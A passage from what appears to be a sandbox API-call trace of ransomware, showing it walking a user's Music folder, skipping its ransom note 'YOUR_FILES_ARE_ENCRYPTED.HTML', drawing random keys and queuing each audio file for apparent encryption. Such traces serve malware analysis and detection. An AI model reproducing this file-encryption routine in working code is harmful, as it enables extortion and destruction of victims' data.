returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*" [0167.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0167.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38174810, ftCreationTime.dwHighDateTime=0x1d7dd24, ftLastAccessTime.dwLowDateTime=0xd4993ee0, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xd4993ee0, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x1709b, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="-ScN6EQhA.mp3", cAlternateFileName="-SCN6E~1.MP3")) returned 1 [0167.804] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3") returned 62 [0167.804] lstrcmpW (lpString1="-ScN6EQhA.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.804] PathFindExtensionW (pszPath="-ScN6EQhA.mp3") returned=".mp3" [0167.804] lstrlenW (lpString=".mp3") returned 4 [0167.804] PathFindExtensionW (pszPath="-ScN6EQhA.mp3") returned=".mp3" [0167.804] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\-scn6eqha.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.805] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=94363) returned 1 [0167.805] GetProcessHeap () returned 0x270000 [0167.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.806] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0B") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="40") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EC") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="97") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0B") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="27") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="93") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A9") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="06") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="2A") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="66") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="8F") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="43") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E3") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="EA") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="32") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F3") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D4") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="C9") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="10") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F9") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="25") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="14") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="1C") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="72") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="FC") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D3") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="2C") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="98") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="53") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="C0") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="63") returned 2 [0167.807] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" [0167.807] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.807] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.811] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee32080, ftCreationTime.dwHighDateTime=0x1d7d73a, ftLastAccessTime.dwLowDateTime=0x9c127b20, ftLastAccessTime.dwHighDateTime=0x1d7e6cd, ftLastWriteTime.dwLowDateTime=0x9c127b20, ftLastWriteTime.dwHighDateTime=0x1d7e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5b7f, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="bZOq0vO.mp3", cAlternateFileName="")) returned 1 [0167.815] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3") returned 60 [0167.815] lstrcmpW (lpString1="bZOq0vO.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.815] PathFindExtensionW (pszPath="bZOq0vO.mp3") returned=".mp3" [0167.815] lstrlenW (lpString=".mp3") returned 4 [0167.815] PathFindExtensionW (pszPath="bZOq0vO.mp3") returned=".mp3" [0167.815] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\bzoq0vo.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.815] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=23423) returned 1 [0167.815] GetProcessHeap () returned 0x270000 [0167.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.816] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="48") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7D") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EB") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="E3") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1F") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="42") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="AD") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="12") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7C") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="72") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="68") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="22") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="88") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="7E") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CB") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="EF") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="88") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="16") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="41") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="EF") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="54") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="3C") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2A") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="CD") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3E") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="96") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="37") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="85") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="EC") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="F6") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="45") returned 2 [0167.817] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" [0167.817] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.818] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.824] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdda04ec0, ftCreationTime.dwHighDateTime=0x1d7d75d, ftLastAccessTime.dwLowDateTime=0xf65180, ftLastAccessTime.dwHighDateTime=0x1d7d8b2, ftLastWriteTime.dwLowDateTime=0xf65180, ftLastWriteTime.dwHighDateTime=0x1d7d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x144e0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="JB_KW.m4a", cAlternateFileName="")) returned 1 [0167.824] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a") returned 58 [0167.824] lstrcmpW (lpString1="JB_KW.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.824] PathFindExtensionW (pszPath="JB_KW.m4a") returned=".m4a" [0167.824] lstrlenW (lpString=".m4a") returned 4 [0167.825] PathFindExtensionW (pszPath="JB_KW.m4a") returned=".m4a" [0167.825] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\jb_kw.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.825] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83168) returned 1 [0167.825] GetProcessHeap () returned 0x270000 [0167.825] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.826] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="07") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="2C") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="CB") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="EC") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1B") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="E9") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="84") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A0") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1A") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="06") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4F") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="39") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C2") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="FE") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8A") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C1") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B8") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="45") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="53") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="98") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A7") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="44") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="39") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="91") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="CA") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B0") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="DE") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="2E") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E3") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="D1") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D0") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0167.827] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" [0167.827] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.827] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.877] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753c4000, ftCreationTime.dwHighDateTime=0x1d7e531, ftLastAccessTime.dwLowDateTime=0x18b881a0, ftLastAccessTime.dwHighDateTime=0x1d7e60c, ftLastWriteTime.dwLowDateTime=0x18b881a0, ftLastWriteTime.dwHighDateTime=0x1d7e60c, nFileSizeHigh=0x0, nFileSizeLow=0x13a2c, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="L4t6BhMlxA7aY-769Z.mp3", cAlternateFileName="L4T6BH~1.MP3")) returned 1 [0167.878] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3") returned 71 [0167.883] lstrcmpW (lpString1="L4t6BhMlxA7aY-769Z.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.883] PathFindExtensionW (pszPath="L4t6BhMlxA7aY-769Z.mp3") returned=".mp3" [0167.883] lstrlenW (lpString=".mp3") returned 4 [0167.883] PathFindExtensionW (pszPath="L4t6BhMlxA7aY-769Z.mp3") returned=".mp3" [0167.883] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\l4t6bhmlxa7ay-769z.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.884] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80428) returned 1 [0167.884] GetProcessHeap () returned 0x270000 [0167.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.887] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D4") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="4A") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="42") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="FB") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="D5") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="97") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="2F") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="4A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="63") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A3") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B5") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="DA") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="57") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="55") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9D") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="87") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B2") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="AF") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F5") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="9C") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AD") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="EA") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="72") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="03") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="97") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="51") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="74") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="2F") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E0") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="43") returned 2 [0167.889] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" [0167.889] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.889] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.894] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7af83490, ftCreationTime.dwHighDateTime=0x1d7dbd6, ftLastAccessTime.dwLowDateTime=0xe30ad040, ftLastAccessTime.dwHighDateTime=0x1d7e240, ftLastWriteTime.dwLowDateTime=0xe30ad040, ftLastWriteTime.dwHighDateTime=0x1d7e240, nFileSizeHigh=0x0, nFileSizeLow=0x8d1d, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="OA1ZxZJqdF70.m4a", cAlternateFileName="OA1ZXZ~1.M4A")) returned 1 [0167.895] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a") returned 65 [0167.895] lstrcmpW (lpString1="OA1ZxZJqdF70.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.895] PathFindExtensionW (pszPath="OA1ZxZJqdF70.m4a") returned=".m4a" [0167.895] lstrlenW (lpString=".m4a") returned 4 [0167.895] PathFindExtensionW (pszPath="OA1ZxZJqdF70.m4a") returned=".m4a" [0167.895] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\oa1zxzjqdf70.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.906] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=36125) returned 1 [0167.906] GetProcessHeap () returned 0x270000 [0167.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.910] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="E6") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="AF") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0F") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="27") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="54") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="0E") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="89") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="48") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D8") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="71") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="28") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | 